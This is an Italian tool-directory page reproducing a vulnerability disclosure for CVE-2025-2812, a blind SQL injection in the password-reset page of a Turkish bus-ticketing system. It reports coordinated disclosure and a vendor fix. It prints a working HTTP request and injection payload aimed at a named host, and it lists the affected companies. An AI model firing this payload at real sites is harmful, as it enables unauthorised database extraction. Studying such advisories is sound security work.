Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-2812 — CVE-2025-2812 Iniezione SQL | Kitploit
Strumenti/GitHubGitHub/sahici/cve-2025-2812
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingSicurezza dei Database
GitHubsahici/cve-2025-2812

CVE-2025-2812

CVE-2025-2812 Iniezione SQL

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web

CVE-2025-2812 — Vulnerabilità di SQL Injection in "Bilet Satış Otomasyonu" di Mydata Bilişim Ltd. Şti

📌 CVE-ID: CVE-2025-2812
📢 Avviso USOM: tr-25-0099
🛡️ Tipo di vulnerabilità: CWE-89 - SQL Injection (Boolean-based Blind)
🏢 Prodotto interessato: Bilet Satış Otomasyonu – Mydata Bilişim Ltd. Şti
🌐 URL di esempio del bersaglio: https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php


🔍 Riepilogo della vulnerabilità

Nel prodotto "Bilet Satış Otomasyonu", è stata rilevata una vulnerabilità di SQL Injection Boolean-based Blind nel parametro "Adınızın ilk harfi" (ilkHarf) della pagina di reimpostazione della password (SifremiUnuttum.php). Questa vulnerabilità consente di estrarre dati dal sistema senza nome utente o password.

La vulnerabilità interessa i sistemi delle seguenti compagnie di autobus:

  • Balıkesir Uludağ
  • Kontur
  • Efe Tur
  • Kale Seyahat
  • +20 aziende

💥 PoC (Proof of Concept)

📌 Richiesta HTTP:

root@kitploit:~
GET /otobus-bileti/SifremiUnuttumBilgi.php?TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW HTTP/1.1
Host: otobusfirmasi.com.tr
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php
Cookie: PHPSESSID=***************

🧪 Payload utilizzata:

root@kitploit:~
TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW

🧠 Dettagli tecnici

  • Parametro vulnerabile: ilkHarf
  • Metodo: Boolean-based Blind SQLi
  • Tipo di vulnerabilità: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

🙏 Ringraziamenti

Dopo la vulnerabilità da noi rilevata nel prodotto "Bilet Satış Otomasyonu" sviluppato da "Mydata Bilişim Ltd. Şti", questa falla, annunciata con il codice CVE-2025-2812, è stata divulgata in coordinamento con il produttore e USOM. Siamo orgogliosi di contribuire alla comunità della cybersecurity in questo processo.

A seguito della segnalazione della vulnerabilità, Mydata Bilişim Ltd. Şti ha prontamente applicato tutte le procedure necessarie, chiudendo la falla di sicurezza e integrando ulteriori misure di protezione nei propri sistemi. Li ringraziamo per la trasparenza, la collaborazione e il senso di responsabilità dimostrati durante il processo.

Siamo orgogliosi di contribuire alla comunità della cybersecurity in questo processo.


📬 Contatti

Per qualsiasi domanda, feedback o collaborazione, potete contattarmi:

  • 📧 E-mail: [email protected]
  • 📷 Instagram: @yyasar.yasin

Scarica lo strumento